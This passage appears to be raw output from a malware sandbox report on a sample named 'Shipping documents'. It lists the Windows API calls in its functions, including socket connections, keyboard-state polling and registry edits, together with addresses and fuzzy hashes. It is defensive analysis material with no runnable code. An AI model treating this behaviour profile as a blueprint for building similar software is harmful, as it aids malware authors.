                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                          • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                          • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                          • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3488606520-0
                                                                                                          • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                          • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                          • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                          • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConnectRegistry_memmove_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 15295421-0
                                                                                                          • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                          • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                          • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                          • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                          • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                          • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                          • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3539004672-0
                                                                                                          APIs
                                                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                          • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 327565842-0
                                                                                                          APIs
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                          • String ID:
                                                                                                          • API String ID: 2832842796-0
                                                                                                          APIs
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                          Similarity
                                                                                                          • API ID: Enum$CloseDeleteOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2095303065-0
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                          Similarity
                                                                                                          • API ID: RectWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 861336768-0
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32 ref: 00449598
                                                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                          • _wcslen.LIBCMT ref: 0044960D
                                                                                                          • _wcslen.LIBCMT ref: 0044961A
                                                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                          • String ID:
                                                                                                          • API String ID: 1856069659-0
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                          • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                          • TrackPopupMenuEx.USER32(01936410,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                          Similarity
                                                                                                          • API ID: CursorMenuPopupTrack$Proc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1300944170-0
                                                                                                          APIs
• GetClientRect.USER32(?,?), ref: 004479CC
• GetCursorPos.USER32(?), ref: 004479D7
• ScreenToClient.USER32(?,?), ref: 004479F3
• WindowFromPoint.USER32(?,?), ref: 00447A34
• DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Client$CursorFromPointProcRectScreenWindow
• String ID:
• API String ID: 1822080540-0
• Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
• Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
• Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
• Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6

APIs
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Similarity
• API ID: ClientPaintRectRectangleScreenViewportWindow
• String ID:
• API String ID: 659298297-0
• Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
• Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
• Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
• Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
• Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
• Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
• Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69

APIs
• IsWindowVisible.USER32(?), ref: 00445879
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
• _wcslen.LIBCMT ref: 004458FB
• CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
• String ID:
• API String ID: 3087257052-0
• Opcode ID: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
• Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
• Opcode Fuzzy Hash: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
• Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9

APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 245547762-0
• Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
• Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
• Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
• Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99

APIs
• DeleteObject.GDI32(00000000), ref: 004471D8
• ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
• SelectObject.GDI32(?,00000000), ref: 00447228
• BeginPath.GDI32(?), ref: 0044723D
• SelectObject.GDI32(?,00000000), ref: 00447266
Similarity
• API ID: Object$Select$BeginCreateDeletePath
• String ID:
• API String ID: 2338827641-0
• Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
• Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
• Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
• Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD

APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
• Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
• Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
• Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9

APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460C17
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
• MessageBeep.USER32(00000000), ref: 00460C46
• KillTimer.USER32(?,0000040A), ref: 00460C68
• EndDialog.USER32(?,00000001), ref: 00460C83
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
• Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
• Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
• Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
APIs
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$Icon
• String ID:
• API String ID: 4023252218-0
• Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
• Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
• Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
• Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: DeleteDestroyObject$IconMessageSendWindow
• String ID:
• API String ID: 1489400265-0
• Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
• Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
• Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
• Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
APIs
  • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
• DestroyWindow.USER32(?), ref: 00455728
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
• String ID:
• API String ID: 1042038666-0
• Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
• Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
• Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
• Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
APIs
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
• Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
• Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
• Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
APIs
• __getptd.LIBCMT ref: 0041780F
  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
• __getptd.LIBCMT ref: 00417826
• __amsg_exit.LIBCMT ref: 00417834
• __lock.LIBCMT ref: 00417844
• __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
• Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
• Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
• Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
APIs
  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
• ___set_flsgetvalue.LIBCMT ref: 00413D20
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
• ___fls_getvalue@4.LIBCMT ref: 00413D2B
  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 00413D3E
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
• ExitThread.KERNEL32 ref: 00413D4E
• GetCurrentThreadId.KERNEL32 ref: 00413D54
• __freefls@4.LIBCMT ref: 00413D74
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 2403457894-0
• Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
• Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
• Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
• Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
APIs
  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
• ___set_flsgetvalue.LIBCMT ref: 004151C0
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
• ___fls_getvalue@4.LIBCMT ref: 004151CB
  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 004151DD
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
• ExitThread.KERNEL32 ref: 004151ED
• __freefls@4.LIBCMT ref: 00415209
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 4247068974-0
• Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
